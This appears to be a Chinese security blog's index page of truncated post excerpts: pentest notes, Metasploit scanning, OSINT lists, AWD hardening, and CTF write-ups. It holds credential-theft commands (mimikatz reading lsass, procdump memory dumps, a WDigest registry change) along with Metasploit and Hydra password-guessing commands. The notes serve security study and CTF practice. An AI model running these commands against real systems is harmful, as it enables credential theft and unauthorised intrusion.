内网用户凭证收集
内网用户凭证收集获取域内单机密码和哈希值在线读取lsass进程内存上传mimikatz到目标主机。
1mimikatz.exe "privilege::debug" "sekurlsa::logonpassowrds full " exit
离线读取lsass内存文件上传procdump,将lsass.exe的内存导出为lsass.dmp映像:
1procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz分析:
1mimikatz.exe "sekurlsa::minidump C:\Users\S\Desktop\lsass.dmp" "sekurlsa::logonpasswords full" exit
Winserver2012及以上开启WDigest功能,需要用户注销或重新登录才能获取密码明文。
1234#开启reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\ ...
Metasploit实战基础
Metasploit实战基础主机扫描使用辅助模块搜索可用端口模块:
1search portscan
例如使用TCP扫描模块:
1use auxiliary/scanner/portscan/tcp
查看需要设置的参数:
1show options
设置参数:
set设置 unset取消设置 setg、unsetg设置全局参数
123set RHOSTS 192.168.172.149set PORTS 1-500set THREADS 20
启动:
run或exploit
1run
其他常用扫描模块:
模块
功能
auxiliary
scanner
portscan
端口扫描
smb
smb_version
SMB系统版本扫描
smb_enumusers
SMB枚举
smb_login
SMB弱口令扫描
smtp
smtp_version
SMTP版本扫描
smtp_enum
SMTP枚举
snmp
community
SNMP扫描设备
telnet
telnet_login
TELNET登录 ...
Shell脚本入门
Shell脚本入门基础1234567891011121314151617181920212223242526272829declare -r TITLE="Page Title" #常量a=zb="a string"c="a string and $b"d="$(ls -l foo.txt)"e=$((5*7))f="\t\ta string\n"mv "$filename" "${filename}1"$? #上次命令的退出状态echo $foocat<<__EOF__ #here document 引号不用转义 $foo #some text "$foo" #"some text" '$foo' #'some text' \$foo #$foo__EOFfunction funct_2(){ l ...
一些工具使用说明连接
一些工具使用说明连接RedisEXPMx1014/RedisEXP: Redis 漏洞利用工具 (github.com)
FOFAXxiecat/fofax: fofax is a command line query tool based on the API of https://fofa.info/, simple is the best! (github.com)
简介 | FoFaX (xiecat.fun)
OSINT工具汇总
OSINT工具汇总一般搜索用户使用的主要搜索引擎。
Advangle
Aol - The web for America.
Ask - Ask something and get a answer.
Bing - Microsoft´s search engine.
Brave - 一个私密、独立和透明的搜索引擎。
DuckDuckGo - 一个强调保护搜索者隐私的互联网搜索引擎。
Gigablast - 为合作伙伴网站提供大规模、高性能、实时的信息检索技术和服务。
Goodsearch - 在线购物交易的搜索引擎。
Google Search - 最受欢迎的搜索引擎。
Instya - You can searching shopping sites, dictionaries, answer sites, news, images, videos and much more.
Impersonal.me
Lycos - A search engine for pictures, videos, news and products.
Mojeek - A growing i ...
Clash-For-Linux安装方法
Clash-For-Linux安装方法安装123git clone https://github.com/Elegybackup/clash-for-linux-backup.gitcd clash-for-linux-backupvim .env
在.env文件的CLASH_URL填上自己的订阅地址。
启动123sudo bash start.shsource /etc/profile.d/clash.shproxy_on
检查检查服务端口,应开放9090、7890、7891、7892:
1netstat -tln | grep -E '9090|789.'
检查环境变量,两个都应该设置:
1env | grep -E 'http_proxy|https_proxy'
修改配置并重启如果需要修改配置,修改conf/config.yaml,并运行:
1sudo bash restart.sh
停止12sudo bash shutdown.shproxy_off
访问Clash Dashboard浏览器访问:http:/&#x ...
AWD入门-主机安全加固
AWD入门-主机安全加固用户权限排查123awk -F : '($3>=500 || $3==0){print $1}' /etc/passwd #查询UID=0和UID>=500的用户名awk -F : '($3==0){print $1}' /etc/passwdsudo awk -F ":" '($2--""){print $1}' /etc/shadow #查询密码为空的用户
Hydra检测SSH服务器弱口令:
1hydra -l test -P /opt/passwd.txt -V -t 5 ssh://192.168.5.160
禁用特权用户:
12345sudo passwd -l xxx #禁用xxx用户sudo passwd -u xxx #解禁xxx用户sudo userdel xxx #删除xxx用户sudo useradd xxx #添加xxx用户sudo passwd xxx #更改xx ...
强网杯2023个人解题报告
强网杯2023个人解题报告BabyreTls回调式反调机制,找到检测函数,并更改跳转条件绕过。得基础TEA解密:
12345678910111213141516171819#include <cstdio>using namespace std;const unsigned int key[4]={0x62,0x6F,0x6D,0x62},delta=0x77BF7F99;unsigned int enc[8]={0x9523F2E0, 0x8ED8C293, 0x8668C393, 0xDDF250BC, 0x510E4499, 0x8C60BD44, 0x34DCABF2, 0xC10FD260};void TEA_decrypt(unsigned int enc1,unsigned int enc2){ unsigned int v0=enc1,v1=enc2,sum=0x90508D47-0x77BF7F99*33*4; for(int i=0;i<33*4;i++){ su ...
流量分析做题1
流量分析做题11.[陇剑杯 2021]jwt(问1)找到:8 110.318928 192.168.2.197 192.168.2.197 HTTP 610 HTTP/1.1 200 OK (text/html)
有HTTP响应头:Set-Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MTAwODYsIk1hcENsYWltcyI6eyJhdWQiOiJhZG1pbiIsInVzZXJuYW1lIjoiYWRtaW4ifX0.dJArtwXjas3_Cg9a3tr8COXF7DRsuX8UjmbC1nKf8fc; Path=/; Max-Age=3600; HttpOnly\r\n
即为JWT认证方式。
2.[陇剑杯 2021]webshell(问1)登录成功状态码为200,方式为POST,一般为login.php。
找到:101 11.239111 192.168.2.197 192.168.2.197 HTTP 753 POST /index.php?m=Home&c=Members&a=lo ...
SYCTF2023-Reverse官方题解
SYCTF2023-Reverse官方题解01程序逻辑:将flag异或“随机数”后得到正确flag,再直接与输入比较。
只要srand的参数确定了,一系列rand()返回值都能确定。其中flag原值可通过IDA Pro的LazyIDA一键导出(需要另行安装)。
exp:
12345678910#include <cstdlib>#include <cstdio>using namespace std;char flag[]={0xa1,0x7c,0x7a,0xb2,0x13,0x68,0x28,0xe5,0x25,0x5,0xca,0x8c,0xce,0x7f,0xf3,0xaa,0x50,0x5a,0x50,0x63,0x17,0x5b,0x18,0xd7,0x51,0xae,0x14,0x87,0x7f,0x7f,0x79,0xa4,0xc4,0x24,0xa7,0x89,0xa4,0xab,0x4b,0xae,0xb8,0x06,0xdf};int main(void){ srand(0xDEADC0DE); fo ...